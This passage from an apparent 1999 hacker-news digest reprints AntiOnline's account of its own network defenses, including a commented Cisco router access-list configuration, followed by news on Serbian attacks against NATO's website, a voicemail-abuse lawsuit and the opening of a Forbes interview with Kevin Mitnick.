list, type your correct e-mail address in the form at the bottom
of the page at http://www.aolsucks.org -- or send e-mail to
MAJORDOMO@AOLWATCH.ORG containing the phrase SUBSCRIBE AOLWATCH
~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~
@HWA
21.0 AntiOnline. hack attempts and intelligence gathering.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 25 Mar 1999 19:31:45 -0700 (MST)
From: mea culpa <jericho@dimensional.com>
To: DC-Stuff <dc-stuff@merde.dis.org>
Subject: Antionline Security & Hacker Intelligence
Message-ID: <Pine.SUN.3.96.990325192040.28084p-100000@flatland.dimensional.com>
Sender: owner-dc-stuff@dis.org
http://www.AntiOnline.com/SpecialReports/antionline-security/
[Anti-online has published some details about how they stay so secure from
those attacks launched from "175 unique hosts a day". Curious tho..]
http://www.AntiOnline.com/SpecialReports/antionline-security/router.html
We use both static and recursive access lists, as well as TCP Intercept
(I'll go more in depth about those below). The router can only be accessed
via console (almost totally eliminates the fear of someone breaking into
the router, which would be a bad thing.)
http://www.AntiOnline.com/SpecialReports/antionline-security/omg.html
If the "user" has done several hack attempts against us, the system may
escalate the attempt, and actually set up a deny statement in our router,
which stops the host from even passing data into our lan.
[So how does their program update the router if there is console only
access?]
http://www.AntiOnline.com/SpecialReports/antionline-security/info-gathering.html
Not only do we try to keep up with the latest exploits and
vulnerabilities, we also try to keep up with the latest THREATS. Exploits
are no danger to a system at all, if there's no one trying to use them
against you. But, as with many networks, there never seems to be a limited
supply of people willing to use those exploits against us. So, one of the
things that we do (and dedicate a lot of resources to), is gathering
intelligence.
What are the active hack groups? Who's in those groups? What groups were
those people in before this one? What exploits were used? What are their
motives? What are they saying to other hack groups? What sites have they
hit? What domains do they have access to? So on and so on.
[So JP/AO are now gathering profiles on active hacking groups. Seems these
groups that talk to him for his stories should be careful what they say.]
-=-
-=-
From AntiOnline
Greetings All:
I was planning on writing this up in a formal, stuffed shirt, journalistic mode,
but soon decided that wasn't me, and that I'd be able to explain it better in my "MailBag"
style of writing. So, I've warned you. Continue reading at your own risk, heh.....
I get dozens of e-mails a day asking me different questions about our own security. What
products do we use, what policies do we have, how do we monitor, administer, firewall, and
so on? Well, here it is. I'm going to go through our current security infrastructure step
by step. I'll give you everything from descriptions of proprietary in-house software that
we use, to our Cisco router configuration files. I've always said (as have many, many
others for that matter), that there is no such thing as "security through obscurity", so
I'm going to practice what I preach. I don't want the "average users" that read our site
to get intimidated at this point. I'm going to go through everything step by step, provide
links where you can learn more about any subject which becomes "technical", and will use
common English (which I use anyway. I hate reading books written by college professors which
put forth a larger effort convincing the reader they know every technical bit of jargon under
the sun, than they do actually explaining their subject matter). Also, I hope to dispel the
common myth that securing a network has to be an expensive endeavor. We are not a big
budget operation by any extent of the imagination, and you don't have to be one either.
So without further delay, here it is. The AntiOnline Information Security Systems and Policies.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
1 Environmental Security (I'm not talking about our operating systems.)
2 Garbage In, Garbage Out (How secure is our uplink?)
3 Ground Zero (Using Our Router As A First Line Of Defense)
4 There's No Place Like Home (Our desktops, or a battle ground?)
5 Watching Our Network (Highways have patrolmen and so does AntiOnline's network.)
6 OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up for ourselves!)
7 Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?)
8 Great, We're Finally Secure (No we're not.)
Environmental Security (I'm not talking about our operating systems.)
Let's start at ground zero. Our offices. Having advanced digital security in
place does us no good if our physical and environmental security is lacking.
While this is probably not the most exciting or technical issue that I'll be
covering, I felt it important to include in the overview of our system.
Physical Security:
We use a wireless security system by Linear. There are a couple of good things
which attracted us to this system. First, it's all battery operated, with the
exception of the base unit. The base unit does, however, have a battery back-up
incase of power outage. We use standard door and window censors, as well as
motion and heat change detectors, smoke alarms, and carbon dioxide detectors.
If a sensor is triggered, it sends an alert signal to our base unit, which sets
off a loud audible alarm, as well as contacting our monitoring service. The
sensors also send an "on-line signal" once every minute to the base unit. If
the base unit fails to receive a signal from one of these devices, the alarm
is sounded as well (this protects against signal jammers and the like). There
are only a few vulnerabilities that I could predict for this system. The main
one would be someone cutting the phone lines where they enter the building.
Although we'd still get an audible alarm, the monitoring station wouldn't be
contacted, unless by us directly using a cellular phone, or by a neighboring
business hearing the alarm and alerting the police, which patrol this area on
a regular basis anyway (We found out that the police have a very good response
time to our location. We had to call them once to report a "suspicious vehicle"
that was sitting in our parking lot at night for some time with all of its
lights off. It turned out that the vehicle contained little more than a couple
of teenagers that decided to use our parking lot as a convenient place to test
out their vehicle's shocks, if you know what I mean.) Our system also includes
a closed circuit television system, which sends footage via video cables to a
monitoring station and vcr in my apartment. Outdoor lighting is on at all times
after dark, and battery operated exit lighting is activated during power
outages. Every floor also has a fire extinguisher mounted in a convenient place.
The major vulnerability that we currently have as far as physical security goes
would be from herf or tempest related attacks. With a herf attack, we would only
have to worry about the loss of data, and not the compromise of it (we do include
current copies of nearly everything off site). Due to our location, a tempest
attack would be very difficult, and incomprehensibly unlikely. If some agency is
sitting in a van outside of our office and is monitoring us via tempest, we have
a lot more problems to worry about than our data being compromised.
Environmental Security:
Our office has both central heat and air, and we try to maintain a constant in-door
temperature of 70 degrees. Each room has a Kenmore Hepa-Filter and Air Ionizer to
help maintain a dust free atmosphere. We use "Office Care" anti-dust and static
wipes on all monitors, and lightly mist the office carpeted floor with a mixture of
liquid fabric softener and water once a week (That is a GREAT tip to ensure a static
free environment that I picked up from the 1996 International Super Computing
Convention).
We also shred EVERY scrap of paper that leaves the office with an "Office Companion"
paper shredder (making sure that we stir it all up before throwing it away
(Yes, we actually do this, scarry, isn't it?). This helps to stop any dumpster divers
from getting any trade secrets, or other goodies from our garbage.
Every window has a mini-blind on it, which would make it difficult to look over our
shoulders from 100 feet away with binoculars. We usually have loud music playing
which would make it very unpleasant to try and spy in on us with a laser listening
device pointed at a window (haha).
All computers in our offices are on battery back up systems. We have a calibrated
up-time of a little under 3 hours without electricity on all servers and network
equipment. We have both rack mount and floor model APC Smart-UPS systems. One of
our network monitoring stations alerts us in the event of a power outage, and
all servers get safely shut down when the batteries reach a critically low level
(this is all done through the Smart-UPS software).
Garbage In, Garbage Out (How secure is our uplink?):
It's an expression that my high school chemistry teacher used to use when working
with complex formulas, but I've found it to apply to information security (and many
other things) as well. Having a very secure lan does little good if there's someone
sitting on our upstream provider sniffing every un-encrypted packet that comes into
us or leaves from us.
We go through a company called "StarGate". They're the largest ISP in the Pittsburgh
area, with over 20,000 customers, 1,500 of which are corporate. Now, there is one
bad thing to assume here. "Oh, it's a huge ISP, they must really know what they're
doing, and be very secure". Well, don't count on it.
Our first step was to compile a list of a half dozen different ISPs. We chose these
based on the speed of the backbone that they have, available services that they
offered, the size of their staff, the types of technology that they implemented, and
of course, cost. We found that Stargate had a redundant dual T3 connection to the
backbone, a staff of over 60, and although their fees were a little more than some of
their competitors, we felt that they were probably the best over-all ISP for us. We
called and talked to both corporate account agents, and engineers, to get a feel for
the staff and the technology that they use. We did several trace routes from various
machines through their network, to get an idea of how traffic was routed, and even
checked for any obvious security holes.
As standard procedure, StarGate usually monitors traffic to their customer's networks
so that they can be alerted automatically if the circuit goes down, and so they can
keep bandwidth usage reports. They also are accustom to providing both DNS and Email
services for nearly every one of their customers. We decided, to help ensure the
integrity of our data, that we would disable their ability to monitor our traffic and
bandwidth (which meant setting up special arrangements to allow them to be notified
if our circuit goes down), and to do all of our own service hosting (which includes
e-mail and dns). Our email server sends directly to all remote hosts, instead of
using our ISP's server as an intermediary.
If I had first choice, I would have gotten a connection directly to the backbone
(which you can get from Sprint for about the same as going through an intermediary ISP).
That would have eliminated an entire network from our loop, but we found that due to our
location, that would have been nearly impossible due to the distance that the
circuit would have had to travel (in other words, T-1s have distance sensitive charges,
and Bell Atlantic would have socked it to us).
Ground Zero (Using Our Router As A First Line Of Defense):
Although it takes security on all levels to ensure a secured lan, this is what I consider
to be THE MOST single important security measure that we have in place.
We use a Cisco 2611 router with integrated csu. We upgraded both the ram (with an extra
32meg dimm) and the IOS server software to 11.3.7(T) Enterprise Plus edition. This allows
us to implement the newest security features offered by IOS.
Before I go any further, let me give you all a little piece of advice on buying ram for
your Cisco Router. For THE LOVE OF ALL THAT IS GOOD, do NOT by your ram from Cisco. We
priced a 32 meg dimm from cisco as being almost $1,000. Now, through a third party vendor
(which was kindly pointed out to us by Corey Gallatin), we only paid $70. The vendor is
Crucial Technology, they're worth a look (you can get flash memory cheap too).
We use both static and recursive access lists, as well as TCP Intercept (I'll go more in
depth about those below). The router can only be accessed via console (almost totally
eliminates the fear of someone breaking into the router, which would be a bad thing.)
We also log all denies to a syslog server (I'll talk more about what we do
with those in my section on network monitoring).
Below is the actual configuration file from our Cisco Router (All of the relevant parts of
it anyway. I took out things like the interface definitions, routing information,
encrypted password strings, etc. This is by no means meant to be an example to follow for
setting up a cisco configuration file, but mainly to show our use of access lists
to deny traffic into our internal lan). We spent a great deal of time auditing our systems
and determining our risks before creating this file. It's important to have a list of
all servers and what services they're running. It's also important to have a list of all
workstations along with a description of how much access each one of them should
have to the lan and the internet. This will make it MUCH easier to come up with your final
configuration without too much trouble.
Router config file with commentary by JP.
!
Being able to finger current connections to the router is evil. Disable it.
no ip finger
This is the start of the tcp intercept configuration. TCP Intercept is a relatively
new feature of IOS designed to stop SynFloods. The router will check to make sure that every
new connection coming in is valid, and then creates an internal table of each connection, valid
or invalid. It will permit through only valid connections, which stops synflooding, and having
an internal table means it only has to verify connections from a host once within an established
time period, which cuts down on router processor utilization (but eats up the ram, which is why
we upgraded it).
ip tcp intercept list 199
ip tcp intercept connection-timeout 7200
ip tcp intercept max-incomplete low 100
ip tcp intercept max-incomplete high 550
ip tcp intercept one-minute low 100
ip tcp intercept one-minute high 550
End of tcp intercept configuration, with the exception of the access-list, which is below
!
I took out all of the interface configurations with the exception of the one below, simply
because they're not relevant.
interface Serial0/0.112 multipoint
We'll set up both an incoming and outgoing access list.
ip access-group reflexin in
ip access-group reflexout out
no ip unreachables
no ip route-cache
no ip mroute-cache
That's all of the relevant configurations in this interface.
!
Here's our access list for all incoming traffic
ip access-list extended reflexin
deny ip any host 208.195.220.45 log-input
deny ip any host 209.166.177.33 log-input
deny ip host 209.166.177.35 host 209.166.177.35 log-input
deny ip host 209.166.177.36 host 209.166.177.36 log-input
deny ip host 209.166.177.37 host 209.166.177.37 log-input
deny ip host 209.166.177.38 host 209.166.177.38 log-input
deny ip host 209.166.177.42 host 209.166.177.42 log-input
deny ip host 209.166.177.50 host 209.166.177.50 log-input
deny ip host 209.166.177.51 host 209.166.177.51 log-input
deny ip host 209.166.177.52 host 209.166.177.52 log-input
deny ip host 209.166.177.55 host 209.166.177.55 log-input
evaluate alliptraffic
permit udp any host 209.166.177.35 eq domain log-input
permit udp any host 209.166.177.36 eq domain log-input
permit tcp any host 209.166.177.36 eq smtp log-input
permit tcp any host 209.166.177.36 eq pop3 log-input
permit tcp any host 209.166.177.37 eq www log-input
permit tcp any host 209.166.177.38 eq www log-input
permit tcp any host 209.166.177.42 eq www log-input
permit tcp any host 209.166.177.50 eq www log-input
permit tcp any host 209.166.177.51 eq www log-input
permit tcp any host 209.166.177.52 eq www log-input
permit tcp any host 209.166.177.55 eq www log-input
deny tcp any any lt 1024 log-input
deny tcp any any gt 1023 log-input
deny udp any any lt 1024 log-input
deny udp any any gt 1023 log-input
Here's our access list for all out going traffic.
ip access-list extended reflexout
permit ip any any reflect alliptraffic
Here's the access list for tcp intercept
access-list 199 permit tcp any 209.166.177.0 0.0.0.255
!
logging buffered 4096 informational
We send all logs to our syslogd located on one of our monitoring stations.
logging 209.166.177.42
!
There's No Place Like Home (Our desktops, or a battle ground?):
Oook, now starts the fun stuff. Workstation and Server security.
There's a well known phrase in the security field which goes something like
"If you have physical access, you have administrative access". Meaning that
there are several ways to gain access to a machine if you're sitting in front
of it. We do several things to help prevent this. For starters, head into the
BIOS and turn off booting up from floppy or CD. Common sense, but there are
many a high school admin that's been burned by a 7th grader by not doing this.
Our servers all have locking cases (which require a key to open), and some
use fingerprint recognition units to allow us quick and secure access to them
(without having to remember a long password
which changes regularly. Stop the stickies!).
My personal workstation has a MaxLock hardware encryption device installed,
which dynamically triple DES encrypts and decrypts all data on the hard drive.
Now, with the exception of my personal machine, it would be possible for say,
a governmental organization to come in here with a warrant, confiscate all of
our equipment, and take the data right off of it (with the exception of my machine,
which has the dynamic hardware encryption). I'll be the first to admit that having
locked cases with biometric units attached would do little good to prevent this.
However, all important data is stored on removable units, which are all sufficiently
encrypted.Our main concern is not from government intervention, but rather from
some third party breaking in and running off with equipment (which is why we have
an extensive physical security system in place).
To take care of network oriented intrusions on the servers:
We use Memco's "Secured" (for solaris), which is an incredible product that all but
eliminates the possibility of buffer overflow or root attacks.
We also run ISS's "RealSecure Agent For NT" (see my chapter on network security for
more information on RealSecure).
NT based servers and workstations use Norton AntiVirus (I would highly recommend
Norton System Works by Symantec for a low cost set of utilities for win based
systems).
Of course, we use PGP for encrypted e-mail communications.
Keep in mind those are used on top of standard security measures, such as insuring
that we're never running a service that has known vulnerabilities, using strong
passwords that are changed on a regular basis, etc.
Watching Our Network (Highways have patrolmen and so does AntiOnline's network):
We do a LOT of network monitoring. I'm not going to go into the boring details of
EVERYTHING that we do, but here's a look at some of the more important things.
To keep an eye on data running over our network, we primarily use ISS's Real Secure.
I can't speak highly enough of this program. It watches the network for certain
attack signature, and can do several things when it finds them. First, we have it
notify a console on one of the monitoring stations, then kill the remote connection
to our network where the attack is coming from, update our "hack attempts" page on
AntiOnline, and log everything into a database (this database will be used to
dynamically put deny statements into our router to firewall trouble users off of
our lan once and for all). The console monitoring and connection kill are built in
features of RealSecure, everything else is done via proprietary actions that we
programmed on our own (realsecure will pass parameters to external programs on event,
if you choose to have it do so). RealSecure also has agents which can sit on a
server and watch it, sending information back to the console machine, although we
currently only have this implemented on one of our servers for test purposes.
Now, there is one problem that could arise by using RealSecure. Obviously, what it's
doing is throwing the interface card into promiscuous mode, and sniffing the network.
Now, this works just fine if you're using a standard hub, but if you're using a
switched hub (which prevents sniffing, which is a good thing), RealSecure will not
be able to monitor the network, which means that it won't be able to detect attacks
(other than attacks reported to it from Agents which sit on the server machines).
So, what we did was get an HP Switch, which will allow switching for every port,
except a "Master Port" which can be configured to receive all data. So, the only
machine on our network which can sniff, is the network monitoring station. Another
alternative to this would be to set up a sort of switch DMZ (de-militarized zone),
where the data coming in from your router would go to a primary un-switched hub,
which your network monitoring stations would run off of, then going into a second,
switched hub, that the rest of your network would run off of. Using the HP
configurable switch saved us the money and hassle of having to do that.
AntiOnline's Hacker Tracker:
AntiOnline's Hacker Tracker is a work in progress for us. It gives me something to
do in my spare time, and is forcing me to learn more about programming than I had
ever wanted to. Heh. Here's a brief overview of this experimental system, as well
as what I hope it will become in the future:
We pay no attention to most of the attacks against us. The types of attacks which
appear on our "hack attempts page", are simply sent through an automated system
which log them, database them, etc. Those aren't what we're worried about. What
we're worried about are the attacks which DON'T fit into common, predefined
categories which we have set.
Most security scanners now, including RealSecure, look for "attack signatures".
This system works great if the hacker is using a KNOWN method of hacking a system.
However, if the hacker is using a "new method", it's useless. So how do we look
for something, when we don't really know what we're looking for? Every user that
makes a connection of any type into our lan is expected to do certain "normal"
things. Here's an example:
We can expect a user to connect to www.AntiOnline.com, and shortly there after it
would be "normal" to see a connection from that same host on www.AntiSearch.com,
or to noc.AntiOnline.com. That is "normal" behavior. A user following links on
the site, looking at different pages, which may be on different
servers.
However, suppose we see a user which does something like this:
We see a host connect to www.AntiOnline.com, and then to www.AntiSearch.com. Then,
we see the same host connecting to our smtp server. This is NOT "normal" behavior.
If the user was simply providing feedback on the visit, it would either be done via
contact forms on our site (which would be "normal" activity), or we would see a
connection to the smtp server from a separate, outside host (which would be
indicative of the user sending us an e-mail, which "normally" would be sent to an
intermediary mail server, which would pass the mail along to us). So, seeing the
host connecting to our smtp server directly could mean that they're using a mail
client which "direct connects" to our server (which is rare), or they have a mail
server set up on the same machine that they're surfing from (which is also rare,
unless in the case of a shell server, but our page looks sucky in lynx, so that's
rare too). While what the user is doing may not really be a hack attempt, it is
not "normal" activity for our network, so it's flagged for us to look at.
While the above is not something that our system would actually flag for us, it
should give you an idea of how our system works. We've been working on it for a
while now, and it continues to grow and evolve as we do. We hope to make it much
more advanced in the future, by taking data from the thousands of hacks that we
have on file, and turning it into an actual "artificial intelligence system" which
can examine behavior in comparison to known attempts on thousands of other sites.
I'm by no means a great programmer, so maybe in the future we will hook up with
someone to turn this into something cool.
Our Router:
On top of using a network monitoring station, we also have our router send us logs
of every "deny" and every "allow" that are initiated by the access lists, which are
sent to a network monitoring station. These logs are parsed by a proprietary program
that we wrote, and sent into a MiniSQL database. Syslogs from some servers are
passed to this machine as well, and processes on the servers are matched against the
processes coming through the router (You can find out ALL SORTS of interesting things
by doing this). By having all of this data archived and put into a database, it will
allow us to use it in other, more advanced applications in the future.
OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up
for ourselves!):
Many people have asked us what we "do" with the logs of hack attempts against us
that we see on a daily basis. Well, unlike many organizations, where hack attempts
are viewed as "events" which are to be "looked into", hack attempts against
AntiOnline are the rule, not the exception. As a policy, we do not "turn over" any
hack attempts for investigation by any governmental authorities, nor would we do
so if a hacker actually managed to gain access to one of our systems. Due to the
type of organization that we are, we feel that would be hypocritical. We feel that
the important thing for us to do is "secure" our network, because trying to intimidate
people from attempting to hack us for fear of prosecution is ridiculous (something
which sounds common sense, but our government is just now realizing the significance
of it).
We may do several things with users that make "hack attempts" against us. First off,
it's logged and sent to our database. We identify trouble users, and "take action" as
we see fit. A few examples of what we may do:
On common hack attempts, the user's IP address or domain is dynamically posted on our
"hack attempts" page, along with the type of attack the user tried.
We set up a host_deny list for apache using mod_rewrite (Very cool stuff. If you're not
familiar with mod_rewrite, I strongly suggest looking into it. We use it extensively.),
which allows us, or our system, to add ip entries, causing the user to get a 403 access
forbidden when attempting to visit the page.
If the "user" has done several hack attempts against us, the system may escalate the
attempt, and actually set up a deny statement in our router, which stops the host
from even passing data into our lan.
Our mail server uses the MAPS (Mail Abuse Prevention System) Real Time Black Hole List,
to prevent spam. Any spammers that we observe are submitted to the list as well.
There are several other responses that we are currently experimenting with, including
the ever controversial "retaliatory" ones (don't try that one at home kids).
Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?)
One of the things that we spend a lot of time and resources on is gathering "intelligence".
Finding out about the latest discovered vulnerabilities is something nearly every
responsible administrator does, and is something that nearly every responsible security
administrator is obsessed with. But, we take things one step further.
Not only do we try to keep up with the latest exploits and vulnerabilities, we also try to
keep up with the latest THREATS. Exploits are no danger to a system at all, if there's no
one trying to use them against you. But, as with many networks, there never seems to be a
limited supply of people willing to use those exploits against us. So, one of the things
that we do (and dedicate a lot of resources to), is gathering intelligence.
What are the active hack groups? Who's in those groups? What groups were those people in
before this one? What exploits were used? What are their motives? What are they saying to
other hack groups? What sites have they hit? What domains do they have access to? So on and
so on. Although we realize there is no way to determine every possible person out there who
may get the whim one evening to attempt a serious hack, we have found in the past being able
to do such a "risk assessment" has allowed us to deflect many serious hack attempts against
us (now, to be perfectly honest, this information also helps in our news coverage of hacks,
etc. and also provides us with some VERY interesting research data for use with our
experimental Hacker Tracker).
On top of that, we do a lot of the standard "vulnerability and exploit" monitoring as well.
Keeping up with BugTraq, NT BugTraq, RootShell, CERT (which is a great way to learn about
vulnerabilities which were discovered a few months ago, hah), as well as a slew of hacker
mail-lists, zines, news groups, and IRC.
Great, We're Finally Secure (No we're not.)
I'm going to end this little ditty with a phrase that I use often, and always try to keep in mind:
"Securing A Network Is A Process, Not An Event"
If you've gotten nothing else out of this report, I hope that you remember that one sentence. It's
the best piece of advice that any security guru could give you. Let me use the following analogy:
You work hard, save your money, and establish your credit. Finally, you're able to build that
special house that you've always dreamed of. You get the best architect to draw the blueprints,
and hire the best contractors to build it. You even have a landscaper come in to put on the finishing
touches.
Now, your house is finished and flawless. However, does that mean that your never going to have to
work on it again? Your home takes constant care. Washing, cleaning, and yard work on a regular basis
to maintain it. New carpet, roofing, and paint every few years to keep your house in perfect order.
Think right now, what your house would look like if you just "left it". Soon the dust bunnies would
move in, followed by that "I went on vacation in the summer and the house was closed up for a week
and a half" smell, and the ever so shameful "I went to pour milk on my cereal and it came out of the
carton in lumps". After a while, you would start noticing water from the ceiling dripping onto your
carpet during a rain, and the mushrooms and other fungus would begin growing off of those dust bunnies
which are now the size of elephants. Not a pretty site, is it?
Unfortunately, many system admins don't look at their network the same as they would their new house.
After the contractors leave, they simply lay back and enjoy. Sure, it looks and works great at first.
he office has that "there are thousands of dollars of brand spankin new technology in here" smell
(come on, all you techies know the one), and you're sitting pretty high on your new office chair
(the kind that has a lever on the size that let's you drop your seat to it's lowest position at the
end of the day, swing yourself from out under the desk, and the remains spinning for at least three
minutes after you've gotten into your car).
But soon, the hub's collision lights start going on more and more frequently, the chair refuses to go
in the up position until you get off of it, and you're wrists are no longer positioned at that perfect
"I hope I don't get the syndrome" position.
You get the idea.
@HWA
22.0 NATO fights Serbs online.
~~~~~~~~~~~~~~~~~~~~~~~~~
From PCWorld
http://www.pcworld.com/pcwtoday/article/0,1510,10391,00.html
<a href="http://www.pcworld.com/pcwtoday/article/0,1510,10391,00.html">story</a>
NATO Fights Serbs Online
Military headquarters shores up Web site against Serbian hacker attacks.
by Elizabeth de Bony, IDG News Service April 2, 1999, 5:03 p.m. PT
The North Atlantic Treaty Organization has started defensive measures to
protect its e-mail and Web site systems against a well-prepared propaganda
campaign launched by Serbian hackers.
NATO is taking the measures "as soon as possible, but given the size of
the problem, it will be difficult," a source at NATO military headquarters
confirms, declining to provide any details. "These are open systems, and
although we do not want to close them to the public, this is an option."
The disruptions began last weekend, three days after NATO began its bombing
missions. That afternoon a hacker in Belgrade saturated the NATO site with
"ping" bombardment--a tactic in which one computer automatically and
repeatedly calls another.
On a daily basis, another Belgrade-based hacker floods NATO's e-mail system
with nearly 2000 messages. The e-mail introduces up to five additional
computer viruses into the system.
"This is clearly a new element in warfare in the twenty-first century," the
source says.The risk is that without a rapid solution, the hackers may move
on to more damaging activities, such as downloading press releases and
imagery available on the site, tampering with them, and then releasing them
as official documents.
"All of this is well prepared, and part of Milosevic's propaganda war,"
the source explains.
-=- from C|Net
NATO site, email suffer hacks
By Reuters
Special to CNET News.com
March 31, 1999, 4:00 p.m. PT
BRUSSELS--NATO said today that Yugoslav hackers had broken into its Internet
home page and jammed its email system with 2,000 messages per day.
NATO spokesman Jamie Shea said service on NATO's home page had been "erratic
to say the least" since March 28, the fifth day of the alliance's bombing
campaign against Yugoslavia.
"It seems that we have been dealing with some hackers in Belgrade, who have
hacked into our Web site," Shea told a news conference at NATO headquarters
in Brussels.
"At the same time, our email system has also been saturated by one individual
who is currently sending us 2,000 emails a day. We are dealing with macro
viruses from Yugoslavia in our email system," he said.
A senior NATO diplomat said it was clear how well-organized and prepared
Belgrade's offensive was: "It ranges all the way from organized ethnic
cleansing to messing up our Web site."
Shea added: "Let me assure you that despite these technical glitches, you will
continue to receive updated political and operation information from this alliance."
Story Copyright � 1999 Reuters Limited. All rights reserved.
http://www.news.com/News/Item/0,4,34508,00.html?owv
<a href="http://www.news.com/News/Item/0,4,34508,00.html?owv">Story on C|Net</a>
@HWA
23.0 Chicago man sues employer over having week voicemail security.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Silicon Valley.com
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/006063.htm
<a href="http://www.mercurycenter.com/svtech/news/breaking/merc/docs/006063.htm">Link</a>
Posted at 6:53 a.m. PST Friday, April 2, 1999
Man sues employer over voice-mail
abuse
CHICAGO (AP) -- A suburban Chicago man is suing his employer for allegedly failing
to adequately secure the company voice-mail system, even after he complained that
someone had hacked into the system and was passing offensive messages about him.
``I hope that this makes other companies look at their systems and say, 'Gee, could this
happen with our company?' '' Gary Thompson, 45, said Thursday from his home in
Wheaton. ``I would be willing to bet most companies haven't even thought about this.''
Thompson, who is suing both Jewel Food Stores and its parent, Utah-based American
Food Stores Co., claims that on five occasions beginning in 1996, someone posing as a
private investigator hired by the company left false and defamatory messages in the
voice-mail boxes of hundreds of American Stores' employees nationwide.
The messages included claims that he had HIV, was a drug user, cheated on his wife with
company secretaries and stole from the company.
``I started being treated differently immediately after the first message. Work associates
stopped shaking my hand,'' said Thompson, who is on disability leave after suffering what
he described as severe depression in the wake of the voice-mail attacks.
One day Thompson found a note on the front seat of his car in which the author said they
understood he was dying of AIDS and wanted to know how to apply for his reserved parking
space.
``Those kinds of things start to build up and get to you,'' he said. ``No one could know
or understand what it's like to be in my shoes.''
While the law has begun to adapt to issues of privacy and copyright infringement relating
to the Internet and e-mail, voice mail has produced a similar set of concerns.
``As technology advances, people are finding new ways of abusing of it,'' said David Loundy,
a Chicago attorney specializing in technology law.
** Voice-mail security was at the crux of the dispute last year between Chiquita Brands
International and a Cincinnati Enquirer reporter who broke into the company voice-mail system
to gather information for a story that was highly critical of Chiquita.
The reporter's work was later retracted, and he and a Chiquita employee were prosecuted for
tampering with the voice-mail system. The reporter later pleaded guilty to two felony charges.
** Thompson's lawsuit, filed in January in DuPage County Circuit Court, seeks in excess of $50,000
in damages and also names as a defendant ``John Doe,'' the unidentified person who allegedly
obtained a distribution password enabling him to send the messages companywide. Thompson said
he assumes the messenger is a former employee he may have dismissed.
The company insists it reacted swiftly to Thompson's concerns.
``We believe that the allegations are unfounded,'' said Karen Ramos, a spokeswoman for Jewel.
``The company took immediate and appropriate action in response to the unauthorized voice-mail
messages in question.''
Thompson's lawyer, Maureen Murphy, said companies are responsible for the systems they offer
employees.
``A little bit more of the burden has to be placed on the company to ensure security against
the magnitude of damage that can be done to people with the stroke of a key,'' she said.
``(Companies are) the only ones in a position to stop it.''
One legal expert said while there's no previous case law to draw on for Thompson's lawsuit, the
old tenets of law apply.
``It would be kind of like if you had a job in a factory and they gave you a tool to work with
that was faulty and you got injured,'' said George Trubow, director of the Center for Information
Technology and Privacy Law at the John Marshall Law School in Chicago. It is a ``fairly classic,
old-fashioned approach to employer liability.'
@HWA
24.0 Mitnick speaks in a rare q and a, (Forbes)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Via [ISN]
Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
http://www.forbes.com/tool/html/99/apr/0405/feat.htm
<a href="http://www.forbes.com/tool/html/99/apr/0405/feat.htm">Link</a>
By Adam L. Penenberg
Forbes Digital Tool 4-5-99
Kevin Mitnick is the most famous hacker in history. He has been in prison
for more than four years for crimes that, when you get down to it, amount
to little more than illegally copying proprietary software belonging to
major companies including Motorola, Nokia and Sun.
He was made a household name by New York Times reporter John Markoff, who
featured Mitnick in a book called Cyberpunk (published in 1991), then
wrote a front page story for the Times on July 4, 1994, that portrayed
Mitnick as a superhacker who could wreak cyberhavoc--and ruin lives--if
not caught by the Feds.
Then a funny thing happened. Markoff's friend, Tsutomu Shimomura, claimed
that Mitnick had hacked his home computer on Christmas Day, 1994, and went
after him, with Markoff in tow. When Shimomura tracked Mitnick down in
North Carolina, Markoff was there for the kill. This was documented in
subsequent front-page stories and a book called Takedown, for which
Markoff and Shimomura shared a $750,000 advance. Expect the movie version
soon.
Markoff became a journalism star as a result of his crusade. Shimomura's
name, in the ultimate geek tribute, is recognized by Microsoft Word98
spell check. Not even Sherlock Holmes can say that.
Yet, according to Dale Coddington and Brian Martin, both of whom were
hired by the defense to comb through the 9 gigabytes of electronic
evidence amassed against Mitnick, there is no proof that Mitnick hacked
Shimomura. For all the fanfare it received, it was never contained in the
indictment. Yet, the media coverage has had a profound impact on Mitnick's
case.
Mitnick reads everything written about him and says he often can�t believe
what he reads. He has seen himself portrayed as a "dark side" hacker
intent on toppling civilization; a criminal who as a teenager penetrated
computers at NORAD, inspiring the hit flick War Games; a phone phreaker
who, just by whistling three tones into a telephone receiver, could launch
World War III; and a computer hacker who, merely armed with a computer
sans modem, could wreak cyberhavoc from his jail cell.
But the reality is a lot less sexy. Kevin Mitnick is a recreational hacker
with a compulsive-obsessive relationship to information. He hoarded
information, never sold it, and wouldn�t even share it with his friends..
Although he is portrayed in the upcoming film Takedown as an evil menace
to society, Mitnick is really just your average geek who has done some bad
things in his life, and has paid the price. To this day, he would like
nothing more than to dissect some computer program to see how it works.
Says Martin, who often visited Mitnick in prison, "Kevin still wants to
look through cellular source code to see how it works. You can see it in
his eyes that he'd love to kick back with a printout and just figure it
out on his own."
Mitnick doesn�t trust the media. But he agreed to let Forbes interview him
over a span of several evenings recently by telephone.
Here is Kevin Mitnick in his own words:
Forbes.com [F]: How would you characterize the media coverage of you?
Mitnick [M]: When I read about myself in the media even I don't recognize
me. The myth of Kevin Mitnick is much more interesting than the reality of
Kevin Mitnick. If they told the reality, no one would care.
[F} Have stories that John Markoff wrote about you in The New York Times
had any impact on your legal proceedings?
[M} Markoff has single-handedly created "The Myth of Kevin Mitnick,"
which everyone is using to advance their own agendas. I wasn't a hacker
for the publicity. I never hacked for personal gain. If I was some unknown
hacker, accused of copying programs from cell phone companies, I wouldn't
be here. Markoff's printing false and defamatory material about me on the
front page of The New York Times had a substantial effect on my case and
reputation. He's the main reason I'm still in custody.
[F] The Times continues to report (most recently on March 18) that you had
hacked NORAD. Is this true?
[M] No way, no how did I break into NORAD. That's a complete myth. And I
never attempted to access anything considered to be classified government
systems.
[F] What do you think about hacks done in your name--for instance, last
September's hack of The New York Times web site. Do they further your
cause?
